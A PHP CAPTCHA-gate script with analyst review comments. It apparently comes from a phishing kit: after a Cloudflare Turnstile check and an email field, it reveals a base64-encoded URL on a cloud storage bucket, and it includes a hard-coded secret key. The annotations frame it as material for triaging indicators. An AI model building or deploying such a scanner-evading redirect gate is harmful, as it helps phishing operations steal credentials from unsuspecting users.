/home/sweetnotes/www/digicloud/validate-captcha.php
<?php
// JSON endpoint that gates a stored URL behind a Cloudflare Turnstile check:
// the caller POSTs {email, captchaResponse}; on a successful siteverify the
// script answers with a fresh session token and the decoded URL from $urls.
// NOTE(review): a human-check gate that only then reveals an encoded redirect
// target is a pattern often seen on credential-phishing landing pages, where it
// keeps automated URL scanners away from the final page. Intent cannot be
// established from this file alone; triage it together with the calling page
// and the decoded host below.

// Response hardening headers: JSON body, no MIME sniffing, no framing.
header('Content-Type: application/json');
header('X-Content-Type-Options: nosniff');
header('X-Frame-Options: DENY');
// Turnstile secret key hard-coded in source. Anyone who can read this listing
// has the key, so treat it as exposed. It is a page-specific identifier worth
// recording with the other indicators when reporting the site.
define('TURNSTILE_SECRET', '0x4AAAAAACd6-LIUdzu6aRprUe4q34R_d_A');
session_start();
// Throttle: reject with 429 when this session's last_request is under 5 s old.
// last_request is only written on the success path at the bottom of the script,
// so failed attempts and clients that do not return the session cookie are
// never throttled by this check.
if (isset($_SESSION['last_request']) && $_SESSION['last_request'] > time() - 5) {
http_response_code(429);
die(json_encode(['success' => false, 'error' => 'Too many requests']));
}
// Require the X-Requested-With: XMLHttpRequest header, else 403. The header is
// client-supplied, so this filters plain navigations and simple crawlers rather
// than authenticating anything.
if (!isset($_SERVER['HTTP_X_REQUESTED_WITH']) ||
strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) !== 'xmlhttprequest') {
http_response_code(403);
die(json_encode(['success' => false, 'error' => 'Forbidden']));
}
// Parse the JSON request body. The email is sanitised; the CAPTCHA token is
// taken as-is and only forwarded to Cloudflare.
$data = json_decode(file_get_contents('php://input'), true);
$email = filter_var($data['email'] ?? '', FILTER_SANITIZE_EMAIL);
$captchaResponse = $data['captchaResponse'] ?? '';
// Reject syntactically invalid addresses with 400. $email is not read again
// after this check: this script neither stores nor forwards it.
// NOTE(review): presumably the calling page uses the address itself; confirm there.
if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
http_response_code(400);
die(json_encode(['success' => false, 'error' => 'Invalid email']));
}
// Server-side Turnstile verification: POST secret, client token and client IP
// to Cloudflare's siteverify endpoint. No timeout is set and the curl_exec()
// result is not checked; on a transport failure json_decode() yields null and
// the empty() test below rejects the request (fails closed).
$ch = curl_init('https://challenges.cloudflare.com/turnstile/v0/siteverify');
curl_setopt_array($ch, [
CURLOPT_POST => true,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POSTFIELDS => http_build_query([
'secret' => TURNSTILE_SECRET,
'response' => $captchaResponse,
'remoteip' => $_SERVER['REMOTE_ADDR']
])
]);
$result = json_decode(curl_exec($ch), true);
curl_close($ch);
// Verification failed or unreadable: answer 401 and echo Cloudflare's
// error-codes back to the caller.
if (empty($result['success'])) {
http_response_code(401);
die(json_encode([
'success' => false,
'error' => 'CAPTCHA validation failed',
'details' => $result['error-codes'] ?? []
]));
}
// $type is fixed to 'docA', so the 'docB' entry is never selected here.
$type = 'docA';
// Destination URLs are stored base64-encoded. That is encoding, not protection;
// it mainly keeps the hostnames out of plain-text searches of the source.
// Decoded values (defanged):
//   docA -> hxxps://cloudpwnotes-ms0regional[.]us-sea-1[.]linodeobjects[.]com/main.html
//   docB -> hxxps://example[.]com/downloads/docB (placeholder domain)
// The docA host is an object-storage bucket name and is the main network
// indicator in this file.
$urls = [
'docA' => 'aHR0cHM6Ly9jbG91ZHB3bm90ZXMtbXMwcmVnaW9uYWwudXMtc2VhLTEubGlub2Rlb2JqZWN0cy5jb20vbWFpbi5odG1s',
'docB' => 'aHR0cHM6Ly9leGFtcGxlLmNvbS9kb3dubG9hZHMvZG9jQg=='
];
// Look up and decode the selected entry; an unknown key gives an empty string.
$encodedUrl = $urls[$type] ?? '';
$finalUrl = $encodedUrl ? base64_decode($encodedUrl) : '';
// 32 random bytes, hex-encoded, stored in the session as download_token.
// Nothing in this file checks the token again.
// NOTE(review): a consumer would live elsewhere, if one exists.
$uniqueToken = bin2hex(random_bytes(32));
$_SESSION['download_token'] = $uniqueToken;
// Stamp the time of this successful request for the 5-second throttle above.
$_SESSION['last_request'] = time();
// Success response: hand the token and the decoded URL to the calling script.
echo json_encode([
'success' => true,
'uniqueToken' => $uniqueToken,
'finalUrl' => $finalUrl
]);